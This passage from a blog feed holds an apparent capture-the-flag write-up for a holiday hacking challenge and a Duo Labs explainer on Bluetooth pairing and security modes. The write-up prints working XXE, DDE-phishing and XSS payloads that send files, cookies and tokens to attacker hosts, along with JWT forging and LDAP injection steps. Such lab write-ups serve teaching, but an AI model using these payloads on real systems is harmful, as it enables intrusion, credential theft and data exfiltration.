<!ENTITY % inception "<!ENTITY &#x25; sendit SYSTEM 'http://x.x.x.x:1237/?%stolendata;'>">

Then, we can upload the actual XML payload that references our DTD file to the web application:

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE Elf [
    <!ELEMENT Elf ANY >
    <!ENTITY % extentity SYSTEM "http://x.x.x.x:1237/payload.dtd">
    %extentity;
    %inception;
    %sendit;
    ]
>

When the XML file is uploaded, it is executed and we see the result appear in our web server logs:

35.185.118.225 - - [22/Dec/2017 03:56:39] "GET /payload.dtd HTTP/1.1" 200 -
35.185.118.225 - - [22/Dec/2017 03:56:39] "GET /?http://eaas.northpolechristmastown.com/xMk7H1NypzAqYoKw/greatbook6.pdf HTTP/1.1" 200 -

Requesting this URL returns page 6 of The Great Book.

Title: The Dreaded Inter-Dimensional Tornadoes
Hash: 8943e0524e1bf0ea8c7968e85b2444323cb237af

Terminal: I Don’t Think We’re In Kansas Anymore

Opening the terminal in the “I Don’t Think We’re In Kansas Anymore” level gives the following prompt:

Sugarplum Mary is in a tizzy, we hope you can assist.
Christmas songs abound, with many likes in our midst.
The database is populated, ready for you to address.
Identify the song whose popularity is the best.
total 20684
-rw-r--r-- 1 root root 15982592 Nov 29 19:28 christmassongs.db
-rwxr-xr-x 1 root root  5197352 Dec  7 15:10 runtoanswer

This appears to be a straightforward SQLite challenge. First, let’s open the database and determine the schema:

elf@22b7ca7055df:~$ sqlite3 christmassongs.db 
sqlite> .tables
likes  songs
sqlite> .schema likes
CREATE TABLE likes(
  id INTEGER PRIMARY KEY AUTOINCREMENT,
  like INTEGER,
  datetime INTEGER,
  songid INTEGER,
  FOREIGN KEY(songid) REFERENCES songs(id)
);
sqlite> .schema songs
CREATE TABLE songs(
  id INTEGER PRIMARY KEY AUTOINCREMENT,
  title TEXT,
  artist TEXT,
  year TEXT,
  notes TEXT
);

Next, we can create a SQL query that finds the songs with the most likes. This was the query we used:

SELECT songs.title, count(likes.songid) as number_of_likes 
from songs
left join likes
on (songs.id = likes.songid)
group by
    songs.id
order by number_of_likes;

Running the query against the database showed that “Stairway to Heaven” had the most likes:

The Little Boy that Santa Claus Forgot|2140
Joy to the World|2162
Stairway to Heaven|11325

Entering “Stairway to Heaven” as our answer solved the challenge:

elf@22b7ca7055df:~$ ./runtoanswer 
Starting up, please wait......
Enter the name of the song with the most likes: Stairway to Heaven
That is the #1 Christmas song, congratulations!

Problem 7 - SCADA System (EMI)

After previously gaining access to the webmail system and downloading the various emails, we can set our sights on the EMI server:

7) Like any other complex SCADA systems, the North Pole uses Elf-Machine Interfaces (EMI) to monitor and control critical infrastructure assets. These systems serve many uses, including email access and web browsing. Gain access to the EMI server through the use of a phishing attack with your access to the EWA server. Retrieve The Great Book page from C:\GreatBookPage7.pdf. What does The Great Book page describe? We’re told that we need to gain access via a phishing attack. Looking through the emails in our CSV, we see this message from Alabaster Snowball:

"Do you have that awesome gingerbread cookie recipe you made for me last year? You sent it in a MS word .docx file. I would totally open that docx on my computer if you had that. I would click on anything with the words gingerbread cookie recipe in it. I'm totally addicted and want to make some more.

We can also see a message from the elf Minty Candycane to Alabaster Snowball indicating that the relatively new phishing technique leveraging DDE-enabled Word documents might be successful:

You know I'm a novice security enthusiast, well I saw an article a while ago about regarding DDE exploits that dont need macros for MS word to get command execution.

https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/

Should we be worried about this?

I tried it on my local machine and was able to transfer a file. Here's a poc:”

Taking this as a hint, we can create a DDE-enabled Word document with the following payload to upload The Great Book page to a server we control:

{DDEAUTO C:\\Windows\System32\\cmd.exe “/k powershell.exe -W hidden $e=(New-Object System.Net.WebClient).UploadFile(‘http://x.x.x.x:8888/upload’, ‘C:\GreatBookPage7.pdf’;”}

Sending this document to alabaster.snowball@northpolechristmastown.com with the phrase “gingerbread cookie recipe” in the message results in the DDE payload being executed, and page 7 of The Great Book page being uploaded:

35.185.57.190 - - [29/Dec/2017 22:18:42] "POST /upload HTTP/1.1" 302 -
35.185.57.190 - - [29/Dec/2017 22:18:42] "GET /upload HTTP/1.1" 200 -

Title: “Regarding the Witches of Oz”
Hash: c1df4dbc96a58b48a9f235a1ca89352f865af8b8

Terminal: Oh Wait! Maybe We Are

Opening the terminal for the “Oh Wait! Maybe We Are” level, we see the following prompt:

My name is Shinny Upatree, and I've made a big mistake.
I fear it's worse than the time I served everyone bad hake.
I've deleted an important file, which suppressed my server access.
I can offer you a gift, if you can fix my ill-fated redress.
Restore /etc/shadow with the contents of /etc/shadow.bak, then run "inspect_da_box" to complete this challenge.
Hint: What commands can you run with sudo?

The hint is pretty clear - we need to see what commands we can run as sudo. We can do that with sudo -l:

elf@60f4256e332e:~$ sudo -l
Matching Defaults entries for elf on 60f4256e332e:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User elf may run the following commands on 60f4256e332e:
    (elf : shadow) NOPASSWD: /usr/bin/find

This tells us that the user elf is allowed to run the find command as the shadow group without needing to input a password. We can use the -exec flag to tell find to take the shadow.bak copy and copy it back to /etc/shadow.

elf@60f4256e332e:~$ sudo -g shadow find /etc/ -name shadow.bak -exec cp {} /etc/shadow \;

Finally, as instructed, we run inspect_da_box to complete the challenge.

elf@60f4256e332e:~$ inspect_da_box 
/etc/shadow has been successfully restored!

Problem 8 - Elf Database

8) Fetch the letter to Santa from the North Pole Elf Database at http://edb.northpolechristmastown.com. Who wrote the letter?

Navigating to the index page of the elf database service, we are presented with a login page. There’s a message at the bottom with a link to contact support to reset the password: Elf Database

Clicking the link displays a form suggesting that a “customer service elf will review your request to reset your account”. Customer Service Login

The Javascript in custom.js shows how logins are being processed:

function login() {
    var uname = $('#username').val().trim();
    var passw = $('#password').val().trim();
    if (uname && passw) {
        $.post( "/login", { username: uname, password: passw }).done(function( result ) {
            if (result.bool) {
                Materialize.toast(result.message, 4000);
                localStorage.setItem('np-auth',result.token)
                setTimeout(function(){
                    window.location.href = result.link;
                }, 1000);
            } else {
                Materialize.toast(result.message, 4000);
            }
        }).fail(function(error) {
            Materialize.toast('Error: ' + error.status + " " + error.statusText, 4000);
        })
    } else {
        Materialize.toast('You must input a valid username and password!', 4000);
    }
}

The result of a successful login is stored in localStorage under the np-auth key. Watching the network requests when we open the login page, we see that session cookies are also being used. So, if we can steal a valid session cookie as well as the valid np-auth token from an authenticated user, we can log in as that user.

To do this, we can create and submit a malicious support ticket with the following message that will trigger an XSS vulnerability that sends the support elf’s session cookie and auth token to a server that we control:

<img src=x onerror="null;this.src='http://x.x.x.x:4444/test?cookie=' + document.cookie + '&npauth='+localStorage.getItem('np-auth')">

Shortly after submitting this ticket, this request appears in our access logs:

35.196.239.128 - - [22/Dec/2017 19:24:00] "GET /test?cookie=SESSION=hxxer50N2e1C2AFt5X06&npauth=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkZXB0IjoiRW5naW5lZXJpbmciLCJvdSI6ImVsZiIsImV4cGlyZXMiOiIyMDE3LTA4LTE2IDEyOjAwOjQ3LjI0ODA5MyswMDowMCIsInVpZCI6ImFsYWJhc3Rlci5zbm93YmFsbCJ9.M7Z4I3CtrWt4SGwfg7mi6V9_4raZE5ehVkI9h04kr6I HTTP/1.1" 200 -

One of the hints indicates that the auth token may be a JSON Web Token (JWT). Decoding the token with the pyjwt library confirms this is the case:

>>> import jwt
>>> jwt.decode('eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkZXB0IjoiRW5naW5lZXJpbmciLCJvdSI6ImVsZiIsImV4cGlyZXMiOiIyMDE3LTA4LTE2IDEyOjAwOjQ3LjI0ODA5MyswMDowMCIsInVpZCI6ImFsYWJhc3Rlci5zbm93YmFsbCJ9.M7Z4I3CtrWt4SGwfg7mi6V9_4raZE5ehVkI9h04kr6I', verify=False)
{u'dept': u'Engineering', u'ou': u'elf', u'expires': u'2017-08-16 12:00:47.248093+00:00', u'uid': u'alabaster.snowball'}

Unfortunately, this token is expired. To log in to the application, we need to find a way to modify the token with an updated expires field.

The integrity of JWT’s relies on a strong secret used in creating the signature. We can attempt to crack the secret with a tool called jwt-cracker. Within a few moments of running the tool, the secret is recovered:

$ ./jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkZXB0IjoiRW5naW5lZXJpbmciLCJvdSI6ImVsZiIsImV4cGlyZXMiOiIyMDE3LTA4LTE2IDEyOjAwOjQ3LjI0ODA5MyswMDowMCIsInVpZCI6ImFsYWJhc3Rlci5zbm93YmFsbCJ9.M7Z4I3CtrWt4SGwfg7mi6V9_4raZE5ehVkI9h04kr6I
Secret is "3lv3s"

We can use this secret to modify the contents of the JWT to have a valid expires field using the pwjt library:

>>> import jwt
>>> jwt.encode({u'dept': u'Engineering', u'ou': u'elf', u'expires': u'2018-08-16 12:00:47.248093+00:00', u'uid': u'alabaster.snowball'}, '3lv3s')
'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkZXB0IjoiRW5naW5lZXJpbmciLCJvdSI6ImVsZiIsImV4cGlyZXMiOiIyMDE4LTA4LTE2IDEyOjAwOjQ3LjI0ODA5MyswMDowMCIsInVpZCI6ImFsYWJhc3Rlci5zbm93YmFsbCJ9.gr2b8plsmw_JCKbomOUR-E7jLiSMeQ-evyYjcxCPXco'

Adding the obtained session cookie as well as putting the modified JWT in our localStorage takes us to the admin page: Personnel Search

On the admin page, we see the ability to search for elves or reindeer, as well as a dropdown that lets us see our account information. This dropdown contains a link for the “Santa Panel,” however, trying to access the Santa Panel throws an error telling us that we have to be a Claus to log in.

The Javascript on the page contains this snippet:

$('#santa_panel').click(function(e){
        e.preventDefault();
        if (user_json['dept'] == 'administrators') {
            pass = prompt('Confirm you are a Claus by confirming your password: ').trim()
            if (pass) {
                poster("/html", { santa_access: pass }, token, function(result){
                    if (result) {
                        $('#inneroverlay').html(result);
                        $('.overlay').css('display','flex');
                    } else {
                        Materialize.toast('Incorrect Password...', 4000);
                    }
                });    
            }
        } else {
            Materialize.toast('You must be a Claus to access this panel!', 4000);
        }
    });

This tells us that, to authenticate to the Santa Panel, we need to change our user information in our authentication token to be in the administrators department, as well as having Santa’s password.

Let’s start with the password. Ideally, we’d be able to leverage the Elf search function to somehow retrieve Santa’s password. Looking through the page source, we see this commented out snippet:

//Note: remember to remove comments about backend query before going into north pole production network
/*
isElf = 'elf'
if request.form['isElf'] != 'True':
    isElf = 'reindeer'
attribute_list = [x.encode('UTF8') for x in request.form['attributes'].split(',')]
result = ldap_query('(|(&(gn=*'+request.form['name']+'*)(ou='+isElf+'))(&(sn=*'+request.form['name']+'*)(ou='+isElf+')))', attribute_list)
#request.form is the dictionary containing post params sent by client-side
#We only want to allow query elf/reindeer data
*/

This snippet of backend code shows that our input into the name field is inserted directly into an LDAP query. This is dangerous because it allows us to modify the query being executed using LDAP Injection.

Specifically, we can modify the query to retrieve Santa’s information as well as elf information. This is what a normal query might look like if we searched for “santa”:

ldap_query('(|(&(gn=*santa*)(ou=elf))(&(sn=*santa*)(ou=elf)))', attribute_list)

We need to adjust the first condition so that we aren’t limited to searching through the elf OU. One way we could do that is by creating a query that closes off the first condition and then adjusts the syntax. Here’s an example of what the resulting query would look like with the input santa*)(ou=*))(&gn=:

ldap_query('(|(&(gn=*santa*)(ou=*))(&(gn=*)(ou=elf))(&(sn=*santa*)(ou=*))(&(gn=*)(ou=elf)))', attribute_list)

This causes the LDAP query to return any Santa user as well as any user in the elf OU.

Additionally, we want to modify the requested attributes to include the userPassword LDAP attribute, which will return the hashed password. We can modify this using an HTTP proxy: HTTP Proxy

Running this returns the information for every elf as well as Santa:

[
    ['cn=santa,ou=human,dc=northpolechristmastown,dc=com',
    {'telephoneNumber': ['123-456-7893'],
    'description': ['A round, white-bearded, jolly old man in a red suit, who lives at the North Pole, makes toys for children, and distributes gifts at Christmastime. AKA - The Boss!'],
    'mail': ['santa.claus@northpolechristmastown.com'],
    'department': ['administrators'], 
    'gn': ['Santa'],
    'profilePath': ['/img/elves/santa.png'],
    'uid': ['santa.claus'],
    'userPassword': ['d8b4c05a35b0513f302a85c409b4aab3'],
    'sn': ['Claus']}]
]

Sometimes, it’s easiest to first search for a hash in Google to see if someone else has already done the work of cracking it. In this case, searching for our hash takes us to a SANS hash-cracking service where we see that the password is 001cookielips001: Google SANS Hash Crack

Now that we have Santa’s password, we need to recreate our auth token using the secret we cracked earlier to indicate that we are logged in as Santa:

>>> import jwt
>>> jwt.encode({u'dept': u'administrators', u'ou': u'*', u'expires': u'2018-08-16 12:00:47.248093+00:00', u'uid': u'santa.claus'}, '3lv3s')
'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkZXB0IjoiYWRtaW5pc3RyYXRvcnMiLCJvdSI6IioiLCJleHBpcmVzIjoiMjAxOC0wOC0xNiAxMjowMDo0Ny4yNDgwOTMrMDA6MDAiLCJ1aWQiOiJzYW50YS5jbGF1cyJ9.sctCItbO58uewzfMcodRdwS-PxGd4avPNnqZMsMvYKU'

Adding this to localStorage and using the password to log in to the Santa Panel yields the letter to Santa, solving the challenge: Letter to Santa

Terminal: We’re Off To See The...

The terminal in the “We’re Off to See The…” level presents us with this prompt:

Wunorse Openslae has a special challenge for you.
Run the given binary, make it return 42.
Use the partial source for hints, it is just a clue.
You will need to write your own code, but only a line or two.
total 88
-rwxr-xr-x 1 root root 84824 Dec 16 16:47 isit42
-rw-r--r-- 1 root root   654 Dec 15 19:59 isit42.c.un

We can start by viewing the contents of the partial C source code:

#include <stdio.h>
// DATA CORRUPTION ERROR
// MUCH OF THIS CODE HAS BEEN LOST
// FORTUNATELY, YOU DON'T NEED IT FOR THIS CHALLENGE
// MAKE THE isit42 BINARY RETURN 42
// YOU'LL NEED TO WRITE A SEPERATE C SOURCE TO WIN EVERY TIME
int getrand() {
    srand((unsigned int)time(NULL)); 
    printf("Calling rand() to select a random number.\n");
    // The prototype for rand is: int rand(void);
    return rand() % 4096; // returns a pseudo-random integer between 0 and 4096
}
int main() {
    sleep(3);
    int randnum = getrand();
    if (randnum == 42) {
        printf("Yay!\n");
    } else {
        printf("Boo!\n");
    }
    return randnum;
}

This SANS blog post details how to use LD_PRELOAD to load a shared library we specify before executing a binary. This allows us to override functions. In our case, we can override rand() to always return 42.

Here’s the source code to make that happen:

#include <stdio.h>
int rand(void) {
    return 42;
}

We can compile this to a shared library:

elf@7752de8a5df8:~$ gcc fake_rand.c -o fake_rand -shared -fPIC

Then, we can run the binary, telling LD_PRELOAD to load our library and solve the challenge:

elf@7752de8a5df8:~$ LD_PRELOAD="$PWD/fake_rand" ./isit42 
Starting up ... done.
Calling rand() to select a random number.
Congratulations! You've won, and have successfully completed this challenge.

Problem 9 - Villain Reveal

9) Which character is ultimately the villain causing the giant snowball problem. What is the villain's motive?

To answer this question, you need to fetch at least five of the seven pages of The Great Book and complete the final level of the North Pole and Beyond. After beating the final video game level, you are presented with the following conversation revealing that the villain was Glinda, the Good Witch from Oz: Good Witch from Oz Convo

]]>
<![CDATA[Understanding Bluetooth Security]]> mloveless@duosecurity.com(Mark Loveless) https://duo.com/blog/understanding-bluetooth-security https://duo.com/blog/understanding-bluetooth-security Duo Labs Tue, 09 Jan 2018 08:30:00 -0500

The Bluetooth specification is huge and quite complex. As a researcher, it helps when looking at the various Internet of Things (IoT) devices to understand what a vendor of an IoT device actually implemented. This is important when one has to deal with environments where older and less secure Bluetooth implementations on older IoT devices have to interact with the new IoT devices which are capable of better security, and you have to determine what security is actually being used.

In the past, I’ve run into roadblocks while trying to figure out what was going on during various Bluetooth communications such as pairing and encryption, so I’ve put together this blog post to help explain some of the security aspects, how these aspects are typically used, and how to easily spot a few of them during a research effort.

It should be noted that this entire blog post started because I needed to explain LE Privacy in a forthcoming blog post and the “appendix” kept growing until I simply split it off into its own thing.

History

Before we explain current Bluetooth security, we should go back in time a bit. Bluetooth was invented in 1989, but really came into use during the 2000s. There is no one Bluetooth protocol; it is a collection of different protocols grouped together under a single specification. Bluetooth is managed by the Bluetooth Special Interest Group, also referred to as Bluetooth SIG.

In an effort to explain a concept like LE Privacy, we must explain a chunk of the Bluetooth history of security implementations. The “LE” in LE Privacy stands for Low Energy, but it actually has nothing to do with power consumption nor does it mean to imply there is a higher energy consumption mode involving the “Privacy” part of LE Privacy. It is actually a holdover from when there was a “larger” implementation that used more energy (Bluetooth Classic), and a “smaller” implementation when battery life was critical and energy consumption needed to be curtailed (Bluetooth Low Energy, or LE or BLE or even BTLE).

Eventually, these were combined in Bluetooth 4.0, and Bluetooth SIG chose features from both Classic and LE, based upon what was better or when one had something the other didn’t. And that is where the “LE” in “LE Privacy” came from. Remember that comment about Bluetooth being complex? Well, the naming of things like this doesn’t help.

The current standard, as of this writing, is Bluetooth 5 (there is no 5.0, it is just 5), although most devices use (and are optimized for) 4.0–4.2. As we will see later on, a lot of IoT vendors try to support legacy authentication protocols dating back as far as Bluetooth 2.0, and these can affect the quality of security.

In the OSI Model, there are seven layers—yes I can hear you groaning—but I just need to reference a few of them quickly. In the TCP/IP world, TCP is at layer 4, the transport layer. Bluetooth’s layer 4 is Logical Link Control and Adaptation Protocol, or L2CAP.

Sitting on top of L2CAP, mainly in layer 5 - the session layer - is the Security Manager, doing the whole Security Manager Protocol. It is responsible for pairing, encryption and signing. So the application sitting at layer 7 doesn’t have any information about the security stuff, it just chugs along and cares not about the lower layers’ various processes so long as it can send and receive data.

Bluetooth Smart and Bluetooth Smart Ready

As mentioned earlier, with Bluetooth 4.0 came a new security model based upon previous and new work from Bluetooth SIG. In an effort to handle requirements for devices that run off of batteries or devices that might frequently unpair and pair, the terms “Bluetooth Smart” and “Bluetooth Smart Ready” were established. These are simply groupings of characteristics, but their nature affects the security aspect of various devices, so it helps to know the background.

Bluetooth Smart is implemented on peripheral devices like headphones, speakers, fitness trackers, medical devices and so on. These devices are battery-powered and often pair to devices that they may lose contact with for extended periods of time. They may only require periodic connection to their paired host, like during data transfer. Additionally, they can maintain a pairing despite long sleep periods between wake modes—even preventing a second device from pairing.

Bluetooth Smart Ready are devices that can talk to Bluetooth Smart and use all of the capabilities. Your smartphone or your laptop are good examples of Bluetooth Smart Ready devices. If you have an old Bluetooth 2.0 or 3.0 device, Bluetooth Smart Ready can still talk to it.

While I have rarely seen the “Bluetooth Smart” or “Bluetooth Smart Ready” stickers on products (or I have ignored them), they do help illustrate the need for various security elements. For example, how does one maintain pairing in a secure fashion between a computer and a fitness tracker that will periodically upload its data? How does one secure a device or ensure the privacy of the device’s owner when the device may spend most of its time in sleep mode?

Bluetooth Security Modes

There are two security modes: LE Security Mode 1 and LE Security Mode 2. There are also four security levels appropriately numbered 1 through 4, with 4 being the most secure. Yes you can mix levels and modes. To further complicate things, there are two additional security modes named Mixed Security Mode and Secure Connection Only Mode.

We’ll start with the security levels first:

  • Security Level 1 supports communication without security at all, and applies to any Bluetooth communication, but think of it as applying to unpaired communications.
  • Security Level 2 supports AES-CMAC encryption (aka AES-128 via RFC 4493, which is FIPS-compliant) during communications when the devices are unpaired.
  • Security Level 3 supports encryption and requires pairing.
  • Security Level 4 supports all the bells and whistles, and instead of AES-CMAC for encryption, ECDHE (aka Elliptic Curve Diffie-Hellman aka P-256, which is also FIPS-compliant) is used instead.

Then the security modes:

  • Security Mode 1 is those levels without signing of data
  • Security Mode 2 is those same levels with signing of data, including both paired and unpaired communications.
  • Mixed Security Mode is when a device is required to support both Security Mode 1 and 2, i.e., it needs to support signed and unsigned data.

Secure Connection Only Mode is Secure Mode 1 with Security Level 4, meaning that all incoming and outgoing traffic in a Bluetooth device involve authenticated connections and encryption only. To complete the confusing complexity, you can run Secure Connection Only Mode with Secure Mode 2 instead of 1 to ensure all data is signed, but since the data is encrypted, and more math means more computing power, and more computing power means faster battery drain, Bluetooth SIG apparently felt encryption without signing was good enough for this particular mode.

Pairing

Now knowing what these modes and levels are, one can start to answer some of those questions about maintaining pairing despite sleep mode or enforcing privacy on a Bluetooth connection between devices that aren’t always talking to each other. But we need to discuss how they are implemented, starting with pairing.

The pairing process is pretty much where everything security-related takes place and is decided beforehand. Its purpose is to determine what the capabilities are on each end of the two devices getting ready to pair and then to get them actually talking to each other. The pairing process happens in three phases, and we will quickly outline each one.

Phase One

In phase one, the two devices let each other know what they are capable of doing. The values they are reading are Attribution Protocol (ATT) values. These live at layer 4 with L2CAP, and are typically not ever encrypted. They determine which pairing method is going to be used in phase two, and what the devices can do and what they expect. For example, ATT values will be different for a Bluetooth Smart vs a Bluetooth Smart Ready device.

Phase Two

In phase two, the purpose is to generate a Short Term Key (STK). This is done with the devices agreeing on a Temporary Key (TK) mixed with some random numbers which gives them the STK. The STK itself is never transmitted between devices. With STK, this is commonly known as LE legacy pairing. However, if the Secure Connection Only Mode is being used, a Long Term Key (LTK) is generated at this phase (instead of an STK), and this is known as LE Secure Connections.

Phase Three

In phase three, the key from phase two is used to distribute the rest of the keys needed for communications. If an LTK wasn’t generated in phase two, one is generated in phase three. Data like the Connection Signature Resolving Key (CSRK) for data signing and the Identity Resolving Key (IRK) for private MAC address generation and lookup are generated in this phase.

There are four different pairing methods:

  • Numeric Comparison. Basically, both devices display the same six digit value on their respective screens or LCD displays, and you make sure they match and hit or click the appropriate button on each device. This is not to prevent a man-inthe-middle (MITM) attack, mainly because it doesn’t, but rather to identify the devices to each other.
  • Just Works. Obviously, not all devices have a display, such as headphones or a speaker. Therefore, the Just Works method is probably the most popular one. Technically, it is the same as Numeric Comparison, but the six-digit value is set to all zeros. While Numeric Comparison requires some on-the-fly math if you are performing a MITM attack, there is no MITM protection with Just Works.
  • Passkey Entry. With Passkey Entry, a six-digit value is displayed on one device, and this is entered into the other device.
  • Out Of Band (OOB). A communication method outside of the Bluetooth communication channel is not used, but the information is still secured. The Apple Watch is a good example of this workflow. During the Apple Watch pairing method, a swirling display of dots is displayed on the watch face, and you point the pairing iPhone’s camera at the watch face while (according to Apple) bits of information are transmitted via this process. Another example is using Near Field Communication (NFC) between NFC-capable headphones and a pairing phone.

Determining Modes and Levels

As mentioned before, the Layer-7 application is not aware of the underlying Bluetooth security implementation. Therefore, reversing an app used for some Bluetooth-enabled device will not tell you the full story. Nevertheless, there are several steps you can take to determine the security modes and levels for a device.

Initiator or receiver. Determine if the device is an initiator or a receiver. In modern Bluetooth terms, it will fall into the rough categories of Bluetooth Smart or Bluetooth Smart Ready. Think of it this way: a device that initiates the Bluetooth connection during initial pairing is going to be the Bluetooth Smart Ready device. The device being paired to is going to be the Bluetooth Smart device. You will then have to prove if they are in fact Smart or Smart Ready, but knowing which is which will help determine what packets you will need to look at on a sniffer trace. Some tools will list this as Master or Slave, or some other set of terms denoting roles.

If the device you are exploring is a Bluetooth Smart receiver, you can possibly initiate the pairing from your Bluetooth Smart Ready laptop and sniff using the laptop’s Bluetooth interface as the source of your sniffing in Wireshark. See our blog post comparing hacking tools for more details.

Instructions for pairing. When you get your new Bluetooth-enabled device, it will typically include instructions for pairing. Obviously, if the devices have screens that can display a value and you can observe that Numeric Comparison or Passkey Entry is used, great. If OOB is used, even better as this is the most secure pairing method. In these cases, you know modern implementations of Bluetooth security are at least supported. If you see pairing instructions that include something like “if asked for a passcode, use xxxx” where xxxx is a four digit value, then you know Bluetooth 2.0 legacy authentication is supported, and virtually all other modern security elements are most likely not implemented.

However, most pairing involves Just Works, simply because there is no screen on many devices in the Bluetooth Smart category. If Bluetooth 2.0 legacy authentication is not supported, it does not mean additional security elements are implemented, but it helps steer further exploration.

Scanning and probing. Scanning a device with a Bluetooth scanner can help determine security levels. Any information you can get from the scans, including information on the chipset involved will help greatly. If you can determine the chipset in use, you can look up what the chipset is capable of (e.g., “it can handle up to eight connections and has AES-128 support onboard”). If the chipset “supports the latest features of Bluetooth 3.0,” then you know advanced security is not a part of the equation.

Note the MAC address. If the address is a public address and the OUI is in database with the IoT vendor’s name associated with it, they are not using LE Privacy - they are using a constant for the MAC address at all times. You can verify this over time via further scans and probes as the MAC address will remain the same.

If you can connect to the device for probing but any action seems to kick you right back out, most likely Secure Connection Only Mode is in place.

Sniffing the pairing. Detecting the implementation of security elements via a Bluetooth sniffer might seem extremely hard, but once you understand what the different security modes are and how they are used, you can easily determine what has been implemented - assuming you get a successful sniffer trace.

Ideally, you want to capture a sniffer trace of the pairing process. If you are examining the initiator or Bluetooth Smart Ready device, you want the Pairing Request packet. Conversely, if you are examining the receiver or Bluetooth Smart device, you want the Pairing Reply packet.

Bluetooth Security Manager Protocol

The opcode will be 0x01 for a Pairing Request and 0x02 for a Pairing Reply. I/O capacity will be one of the following:

  • 0x00 Display Only
  • 0x01 Display Yes/No (both a display and a way to designate yes or no)
  • 0x02 Keyboard Only
  • 0x03 No Input/No Output (e.g. headphones)
  • 0x04 Keyboard Display (both a keyboard and a display screen)
  • 0x05-0xFF Reserved

OOB Data Flag will be 0x00 for no OOB data or 0x01 for OOB data present. Max Encryption Key Size tells the size of the encryption key in octets, and both the Initiator and Responder Key Distribution bytes convey with flags what keys will be distributed.

The Auth Request byte consists of five fields, and uses the various bits as flags. From least significant bit to most significant bit, here are the fields:

  • Bonding flags, two bits, either 0 or 1 for the very least bit, the other bit is reserved. As such, 0 is for no bonding, the 1 is for bonding. If bonding is used, an LTK will be exchanged, which means two devices can be paired, and a reboot or sleep mode will not unpair the devices. If encryption is supported, this will happen separately after pairing.
  • MITM flag, one bit, 0 is that MITM protection is not requested, and 1 is that MITM protection is requested.
  • Secure connection, one bit. If this is set to 1, the device is requesting to do Secure Connection Only Mode, otherwise it is set to 0.
  • Keypress flag, one bit. If set to 1 it means Passkey Entry needs to be used, otherwise it is ignored.
  • The last three bits are reserved.

Remember though, always check your tools and do not rely on what they tell you - get multiple examples of the same process to help ensure you are sniffing the data accurately. And don’t expect every manufacturer to follow the rules as you might interpret them. Here is a Pairing Reply packet during a pairing of an Apple Watch with an iPhone using the Passkey Entry process that illustrates this perfectly:

Apple Watch Pairing Reply Packet Figure 2. Wireshark interpretation of an Apple Watch pairing reply packet. Note the AuthReq section doesn’t match the raw data.

In Figure 2, the main issue is that byte 24’s (offset 0x17) value is 0x0d. Under the Wireshark interpretation, only the bits for Bonding and MITM are set, while the value of 0x0d suggests the Secure Connection bit is also set. At the time of the sniffer trace, the Passkey Entry method was chosen, but in this case, not only does the Wireshark interpretation not show it’s set, the raw data also suggests it is not set.

It should be noted that using Secure Connection Only Mode implies using either Passkey Entry or OOB as the pairing method. Since OOB is not explicitly set, the default would be Passkey Entry. This is in spite of the fact that the Keypress bit is not set.

This means either two things: 1) Since Secure Connection Only Mode was being used, Apple felt there was no reason to set the Keypress bit since it would be implied, or 2) there will be no pressing of a key on the Apple Watch side, since during Apple’s implementation of Passkey Entry no keypress is needed from the watch. My guess is the latter. During its Pairing Request packet, the iPhone did say that it can do 0x04 (Display Screen and Keyboard for input), so when you consider everything the two devices are claiming they can do in the conversation, they can handle Passkey Entry.

Overall though, during the pairing process the Apple Watch is claiming its I/O Capability is 0x00 which is Display Only, despite the fact that the Apple Watch can do a Display Screen and Keyboard input. It is specifically limiting itself during the pairing process to match what is being requested by the user, who is controlling the pairing choice. There is nothing in the specification about adjusting things to user preference or settings, although it makes sense, especially from a security perspective, to limit the amount of exposure.

This is the level of scrutiny one needs when looking at Bluetooth to either prove or disprove an action or setting. In a report or blog post on the Apple Watch, I might have simply worded this as “the Apple Watch follows the Bluetooth specification for 4.2 during the pairing process” instead of showing this level of detail. But at least you can make the statement firmly.

LE Privacy

Whenever a Bluetooth device needs to transmit, it enters an advertising mode where it announces to the world it is there. Depending upon the nature of the device, it could do this only periodically, or it could be doing this constantly. It uses a MAC address during advertising so that other devices can potentially talk back to it.

One of the issues with this scenario is that a nefarious person could track an individual’s movements by tracking where that MAC address pops up. Therefore, it makes sense that a device trying to protect its owner from tracking would periodically change its MAC address. Naturally, this creates other problems. How will the paired devices know what they are paired to if the address keeps changing? How can I limit the knowledge of my MAC address to only devices I trust, while still protecting myself from being tracked?

This is where LE Privacy comes in. This solution was introduced with the creation of Bluetooth Smart (the 4.0 standard), and it is an efficient solution for the problem. During the pairing process in phase three (as outlined above), the devices exchange a variety of keys. One of those keys is the Identity Resolution Key (IRK). This key allows for the creation and resolution of random MAC addresses to be used in advertising packets.

Basically, the real MAC address of the device isn’t really changed, just what is reported via the advertising packet is. By providing an IRK to a device’s paired partner, you are telling that partner how to “resolve” a MAC address to recognize the device later based off of its random advertising address. To help ensure the devices reconnect, the LE Privacy device will create an advertising packet with the destination MAC address of its paired partner and the random MAC address as the source - the paired partner knows to resolve the MAC address quickly to determine who it is, as it might be paired to multiple devices that use LE Privacy.

This provides a nice way for two devices to remain paired even with interruptions due to sleep mode, power cycling, or physical distance between the devices being greater than the Bluetooth range - and it still helps ensure user privacy by preventing tracking by MAC address.

LE Privacy is extremely easy to spot in a lab environment: you simply scan for MAC addresses and track them over time. By performing actions on the device with LE Privacy that will generate traffic, it will make it easier to spot. The time delay will vary and it is entirely up to the manufacturer to decide the intervals between cycles. I’ve personally seen anywhere from 15 to 30 minutes, and most devices that implement LE Privacy also use a fresh MAC address after every power cycle.

Where’s the Code?

As mentioned, this type of exploration isn’t your typical “APK decompile to get to the code that controls the Bluetooth choices” workflow, since the code for the Bluetooth stack is located in the device’s firmware or in a device driver. If it is in firmware, this can be quite complex to get to, as we’ve seen before.

Summary

Bluetooth security can be complex, but once you do a bit of sniffing and poking around in a device’s security settings (if they exist) you can learn a lot. Even by simply studying behavior, documents, and how devices interact, you can usually figure out not only what a device is capable of from a security perspective, but how much security has actually been turned on.

]]>
